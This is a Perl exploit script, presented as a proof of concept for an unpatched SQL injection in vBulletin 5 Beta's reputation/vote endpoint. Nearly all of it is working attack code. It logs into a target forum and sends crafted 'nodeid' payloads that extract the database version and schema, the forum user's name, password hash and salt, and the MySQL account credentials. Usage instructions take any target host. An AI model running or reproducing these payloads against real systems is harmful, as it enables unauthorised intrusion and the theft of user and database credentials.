yacine_haxor & vBulletin 5.0.0 Beta

1.  
2.  
3. #!/usr/bin/perl
4. ###################################################################################
5. # Satuday, March 30, 2013
6. #
7. #
8. #
9. # _ _ .__ .__
10. # __| || |_| | ____ ____ |__| ____ ____
11. # \ __ / | _/ __ \ / ___\| |/ _ \ / \
12. # | || || |_\ ___// /_/ > ( <_> ) | \
13. # /_ ~~ _\____/\___ >___ /|__|\____/|___| /
14. # |_||_| \/_____/ \/
15. # http://www.zempirians.com
16. #
17. # 00100011 01101100 01100101 01100111 01101001 01101111 01101110
18. #
19. #
20. #
21. # [P]roof [o]f [C]oncept, SQL Injection
22. # vBulletinâ„¢ is the world leader in forum and community publishing software.
23. #
24. #
25. #
26. ###################################################################################
27. # # T E A M #
28. # #######################
29. #
30. # UberLame .......> Provided all proper payloads
31. # Stealth ........> Thanks ;)
32. #
33. ###################################################################################
34. # SUMMARY #
35. ################
36. #
37. # http://target/vb5/index.php/ajax/api/reputation/vote?nodeid=[SQLi]
38. #
39. # Database error in vBulletin 5.0.0 Beta 28:
40. # MySQL Error : Duplicate entry '#5.1.67#1' for key 'group_key'
41. # Error Number : 1062
42. # Request Date : Saturday, March 30th 2013 @ 01:13:40 AM
43. # Error Date : Saturday, March 30th 2013 @ 01:13:41 AM
44. # Script : http:\/\/\/vb5\/index.php\/ajax\/api\/reputation\/vote
45. #
46. ################
47. # VULNERABLE #
48. ################
49. #
50. # vBulletin 5 beta [ALL] - http://vbulletin.com
51. #
52. ################
53. # CONFIRMED #
54. ################
55. #
56. # vBulletin 5 beta 17
57. # vBulletin 5 beta 28
58. #
59. ################
60. # CVE #
61. ################
62. #
63. # There is no CVE reported.
64. #
65. ################
66. # PATCH #
67. ################
68. #
69. # There is no PATCH available.
70. #
71. ###################################################################################
72. # # #
73. # # H O W - T O #
74. # # #
75. # #######################
76. #
77. # Provide the Target: Server, Folder, User, Password, Number and the script will
78. # login and deliver the payload...
79. #
80. # [!USE/]$ ./<file>.pl http://<target>/ <vb5_folder>/ <username> <password> <num>
81. #
82. ###################################################################################
83. use LWP::UserAgent;
84. use HTTP::Cookies;
85. use HTTP::Request::Common;
86. use MIME::Base64;
87. system $^O eq 'MSWin32' ? 'cls' : 'clear';
88. print "
89. ###############################################################################
90. #'########:'########:'##::::'##::::::::'##::::'########:::'#######:::'######::#
91. #..... ##:: ##.....:: ###::'###::::::::. ##::: ##.... ##:'##.... ##:'##... ##:#
92. #:::: ##::: ##::::::: ####'####:'#####::. ##:: ##:::: ##: ##:::: ##: ##:::..::#
93. #::: ##:::: ######::: ## ### ##:.....::::. ##: ########:: ##:::: ##: ##:::::::#
94. #:: ##::::: ##...:::: ##. #: ##:'#####::: ##:: ##.....::: ##:::: ##: ##:::::::#
95. #: ##:::::: ##::::::: ##:.:: ##:.....::: ##::: ##:::::::: ##:::: ##: ##::: ##:#
96. # ########: ########: ##:::: ##:::::::: ##:::: ##::::::::. #######::. ######::#
97. #........::........::..:::::..:::::::::..:::::..::::::::::.......::::......:::#
98. ###############################################################################
99.  
100. [?] Homepage: http://www.zempirians.com
101. [?] Binary: 00100011 01101100 01100101 01100111 01101001 01101111 01101110
102. [?] Effected: vBulletin 5 Beta XX SQLi 0day
103. [?] Irc Server: irc.zempirians.com +6697
104.  
105. ";
106. if (@ARGV != 5) {
107. print "\r\nUsage: perl file.pl www.target.com/ vb5/ username password magicnum\r\n";
108. print "\r\n";
109. exit;
110. }
111. $host = $ARGV[0];
112. $path = $ARGV[1];
113. $username = $ARGV[2];
114. $password = $ARGV[3];
115. $magicnum = $ARGV[4];
116. $encpath = encode_base64('http://'.$host.$path);
117.  
118. print "\n";
119. print "[+] Establishing connection and logging in\n";
120.  
121. my $browser = LWP::UserAgent->new;
122. my $cookie_jar = HTTP::Cookies->new;
123.  
124. my $response = $browser->post( 'http://'.$host.$path.'auth/login',
125. [
126. 'url' => $encpath,
127. 'username' => $username,
128. 'password' => $password,
129. ],
130. Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
131. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
132. );
133.  
134. $browser->cookie_jar( $cookie_jar );
135.  
136. print "[+] Send payload [ 1 of 4 ]\n";
137. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
138. [
139. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
140. ],
141. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
142. );
143. $dataA = $response->content;
144. if ($dataA =~ /(#((\\.)|[^\\#])*#)/) {
145. $fixversion = $1;
146. $fixversion =~ s/\#//g;
147. $fixvb = substr($dataA, 58, 23);
148. };
149.  
150. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
151. [
152. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(schema() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
153. ],
154. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
155. );
156. $dataAB = $response->content;
157. if ($dataAB =~ /(#((\\.)|[^\\#])*#)/) {
158. $fixvbdb = $1;
159. $fixvbdb =~ s/\#//g;
160. };
161.  
162.  
163. print '[+] Recv payload [ SQL Version: '. $fixversion .', running '. $fixvb .', database '. $fixvbdb .' ]';
164. print "\n";
165.  
166. print "[+] Send payload [ 2 of 4 ]\n";
167. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
168. [
169. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(user() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
170. ],
171. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
172. );
173. $dataB = $response->content;
174. if ($dataB =~ /(#((\\.)|[^\\#])*#)/) {
175. $fixuserhost = $1;
176. $fixuserhost =~ s/\#//g;
177. print '[+] Recv payload [ Forum is running as '. $fixuserhost .' ]';
178. };
179. print "\n";
180.  
181. print "[+] Send payload [ 3 of 4 ]\n";
182.  
183. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
184. [
185. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select username from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
186. ],
187. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
188. );
189.  
190. $dataC = $response->content;
191. if ($dataC =~ /(#((\\.)|[^\\#])*#)/) {
192. $fixvbuser = $1;
193. $fixvbuser =~ s/\#//g;
194. };
195.  
196.  
197. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
198. [
199. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
200. ],
201. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
202. );
203.  
204. $dataD = $response->content;
205. if ($dataD =~ /(#((\\.)|[^\\#])*#)/) {
206. $fixvbpass = $1;
207. $fixvbpass =~ s/\#//g;
208. };
209.  
210.  
211. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
212. [
213. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select salt from '. $fixvbdb .'.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
214. ],
215. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
216. );
217.  
218. $dataE = $response->content;
219. if ($dataE =~ /(#((\\.)|[^\\#])*#)/) {
220. $fixvbsalt = $1;
221. $fixvbsalt =~ s/\#//g;
222. };
223.  
224.  
225. print '[+] Recv payload [ VB5 User: '. $fixvbuser . ', Pass: '. $fixvbpass .', Salt: '. $fixvbsalt .' ]';
226. print "\n";
227.  
228. print "[+] Send payload [ 4 of 4 ]\n";
229.  
230. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
231. [
232. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select user from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
233. ],
234. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
235. );
236.  
237. $dataF = $response->content;
238. if ($dataF =~ /(#((\\.)|[^\\#])*#)/) {
239. $fixsqluser = $1;
240. $fixsqluser =~ s/\#//g;
241. };
242.  
243. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
244. [
245. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select password from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
246. ],
247. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
248. );
249.  
250. $dataG = $response->content;
251. if ($dataG =~ /(#((\\.)|[^\\#])*#)/) {
252. $fixsqlpass = $1;
253. $fixsqlpass =~ s/\#//g;
254. };
255.  
256. my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
257. [
258. 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast((select host from mysql.user limit 0,1) as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and (1338=1338',
259. ],
260. User-Agent => 'Mozilla/11.01 (Lanows MB 9.1; rv:13.37) Gecko/20200101 Firefox/13.37',
261. );
262.  
263. $dataH = $response->content;
264. if ($dataH =~ /(#((\\.)|[^\\#])*#)/) {
265. $fixsqlhost = $1;
266. $fixsqlhost =~ s/\#//g;
267. };
268.  
269.  
270. print '[+] Recv payload [ SQL User: '. $fixsqluser . ', Pass: '. $fixsqlpass .', Host: ' . $fixsqlhost .' ]';
271.  
272. #print "\n\n[?] Error dump - payload 1\n\n";
273. #print $dataAB;
274.  
275. print "\n\n";
276.  
277. exit 1;